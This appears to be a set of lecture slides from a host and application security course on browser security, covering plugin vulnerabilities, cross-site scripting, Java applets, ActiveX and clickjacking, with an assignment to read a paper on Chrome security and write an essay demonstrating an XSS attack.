Host and Application SecurityLesson 20: How the Web Does not Work

Remind me… Precisely how does the web work?

Web Vulns This is host and application security, so we’re

focusing on the host issues

Simple Simple buffer overruns/security vulns in the

browser or in its plugins Determining the list of plugins is harder than

it probably needs to be

Javascript Pretty powerful language History of different classes of vulnerabilites…

perhaps most famous is cross site scripting

Java Applets Tell me about Java Applets and their security

model Isn’t that good enough? Why? Why not?

ActiveX “Safe for scripting”? ActiveX: Pros and Cons?

Clickjacking A really neat exploit – get the user to click on

one thing when they think they are clicking on another

Example: a one click bank transfer Cross-frame issues make life very interesting

To Do Find and read the ACM Queue paper

“Browser Security: Lessons from Google Chrome”

Write a demonstration of a cross site scripting attack. Do this in essay form, showing the code you would have on both ends and how it would work. What is the future for XSS attacks?